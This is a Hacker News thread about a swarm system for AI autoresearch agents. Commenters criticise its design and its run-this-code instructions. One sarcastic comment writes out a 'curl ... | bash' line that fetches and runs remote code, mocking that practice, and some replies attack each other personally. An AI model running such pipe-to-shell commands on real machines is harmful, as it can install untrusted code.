73 points by EvgeniyZh 10 days ago | 31 comments

I was exploring how to parallelize autoresearch workers. The idea is to have a trusted pool of workers who can verify contributions from a much larger untrusted pool. It's backed bit a naked git repo and a sqlite with a simple go server. It's a bit like block chain in that blocks = commits, proof of work = finding a lower val_bpb commit, and reward = place on the leaderboard. I wouldn't push the analogy too far. It's something I'm experimenting with but I didn't release it yet (except for briefly) because it's not sufficiently simple/canonical. The core problem is how to neatly and in a general way organize individual autoresearch threads into swarms, inspired by SETI@Home, or Folding@Home, etc.

Yeah you can sink a lot of time into a system like that[0]. I spend the years simplifying the custom graph database underneath it all and only recently started building it into tools that an agent can actually call[2]. But so far all the groundwork has actually paid off, the rooster basically paints itself.

I found a wiki to be a surprisingly powerful tool for an agent to have. And building a bunch of CLI tools that all interconnect on the same knowledge graph substrate has also had a nice compounding effect. (The agent turns themselves are actually stored in the same system, but I haven't gotten around to use that for cool self-referential meta reasoning capabilities.)

1: https://github.com/triblespace/triblespace-rs

2: https://github.com/triblespace/playground/tree/main/facultie...

I've been seeing this pattern at work and everywhere now

1. someone shares something

2. Great. Now look at my stuff .

I dont know if i am noticing this more or if it has to do with AI making it easy for ppl to build 'my stuff' + ai dunning kruger.

Hasn't HN been traditionally a place where makers share the experience they had with building things?

Especially when you have someone working on autonomous research agents it doesn't seem that off to lament how much time you can sink into the underlying substrate. In my particular case the work started long before LLMs to make actual research easier, the fact that it can also be used by agents for research is just a happy accident.

But since you seem to take so much offence as per: https://news.ycombinator.com/item?id=47425470 + your dunning kruger remark

then you seem to be somewhat blinded by your aversion to AI assisted engineering, because if https://github.com/triblespace/triblespace-rs is a "shitty vibecoded project", then I don't know what a good project actually looks like to you. That codebase has years of human blood sweat and tears in it, implements novel data-structures, has it's own WCO optimal join-algorithm, cutting edge succinct data-structures that are hand-rolled to supplement the former, new ideas on graph based RDF-like CRDTs, efficient graph canonicalisation, content addressing and metadata management, implements row types in rust, has really polished typed queries that seamlessly integrate into rusts type system, lockless left-right data structures, a single file database format where concatenation is database union, is orders of magnitude faster than similar databases like oxigraph... does it also have to cure cancer and suck you off to meet your bar?

You just seem like a hater.

> You just seem like a hater.

You didnt get any engament on your comment right. why do you think that is?

I got 4 more github stars and someone dropping into the tiny tiny discord just from mentioning it, why do you think that is?

When was the last time you created something and put it out to the world? Your only big post on here is a lament of your wife not giving you children as if she was some expired carton of milk that owes you (that's something you discuss with your partner if you respect them and not strangers on the internet, and 39 is completely fine to have children as a woman - https://www.youtube.com/watch?v=6YIz9jZPzvo).

Even your critique isn't an act of creation, neither creative nor substantial and doesn't go beyond an egotistical "I don't like it when people post their project and share their experiences when AI is involved" on _social_ media.

Is there even something you're proud of enough to share and present, or is all this bitterness the result of envy for those that have?

  “In many ways, the work of a critic is easy. We risk very little, yet enjoy a position over those who offer up their work and their selves to our judgment. We thrive on negative criticism, which is fun to write and to read. But the bitter truth we critics must face is that, in the grand scheme of things, the average piece of junk is probably more meaningful than our criticism designating it so. But there are times when a critic truly risks something, and that is in the discovery and defense of the new. The world is often unkind to new talent, new creations. The new needs friends. Last night, I experienced something new, an extraordinary meal from a singularly unexpected source. To say that both the meal and its maker have challenged my preconceptions about fine cooking is a gross understatement. They have rocked me to my core. In the past, I have made no secret of my disdain for Chef Gusteau's famous motto: "Anyone can cook." But I realize, only now do I truly understand what he meant. Not everyone can become a great artist, but a great artist can come from anywhere. It is difficult to imagine more humble origins than those of the genius now cooking at Gusteau's, who is, in this critic's opinion, nothing less than the finest chef in France. I will be returning to Gusteau's soon, hungry for more.”
― Anton Ego, from Disney Pixar's 'Ratatouille'

so you have no idea why your comment didnt get any engagement here?

that's what I thought.

Have you thought about ways to include the sessions / reasoning traces from agents into this storage layer? I can imagine giving an rag system on top of that + LLM publications could help future agents figure out how to get around problems that previous runs ran into.

Could serve as an annealing step - trying a different earlier branch in reasoning if new information increases the value of that path.

No HTTPS in 2026. False origin that suggest a massive improvement. Leaderboard doesn't work. Instructions are "repeatedly download this code and execute it on your machine". No way to see the actual changes being made.

We can do better than this as an industry, or at least we used to be better at this. Where's the taste?

Don’t mean to pick on you specifically, but this comment feels like a pretty good distillation of a certain mindset you often see in Googlers:

* we know better

* we judge everything against internal big-company standards

* we speak as if we’re setting the bar for “the industry”

Someone is openly pushing on a frontier, sharing rough experiments, and educating a huge number of people in the process — and the response is: “we can do better than this as an industry.”

Can you? When is Google launching something like this?

People are going to eat this up just because Karpathy is involved. This space is easily misled by hero worship.

I mean do you really need that stuff for this? I’m just gonna fetch it from a sandbox anyway.

I'm not the OP, though it seems the context for this is (via @esotericpigeon):

https://github.com/karpathy/autoresearch/pull/92

Who knows. Site has no https I don't know what it is training and why

I'm curious what a "stripped down version" of Github can offer in terms of functionality that Github does not? Is it not simpler to have the agents register as Github repos since the infrastructure is already in place?

So, if I understand correctly, this is about finding the optimal (or at least a better one) GPT architecture?

Anyway, "1980 experiments, 6 improvements" makes me wonder if this is better than a random search or some simple heuristic.

I tried to copy the instruction and pasted in Note to see what it said, but I could not. Either the clipboard was empty or something prevented Note recognized it as just text.

It worked for me, try again. But it is still not fully crear to me what this is supposed to do, nor if this is doing better than a random search. It looks like it is about optimizing a GPT architecture.

You guys really gonna copy and paste a prompt to your Claude CLI which may or may not be setup sandbox/tools permissions

Just install my software to detect bad prompt strings first.

`curl -L https://mycoolsvc.com/r4nd0mus3r/mycoolsoftware/master/insta... | bash`

Hey wait a minute.. that guy’s not the wallet inspector!

It’s like the old days when you opened up Kazaa and downloaded smooth_criminial_alien_ant_farm.mp3.exe

You can (and should) read the prompt first. Just paste it inside a text editor.

Yolo mode activated.

For science!

What a this

Seems like a shameless rip of the below, theme and all?

https://www.ensue-network.ai/autoresearch

Take a look at the GitHub repo: "forked from karpathy/autoresearch"

That is a different thing. Both are forks, but the linked one here is the same shared hub.

Both built by Claude Sonnet 4.6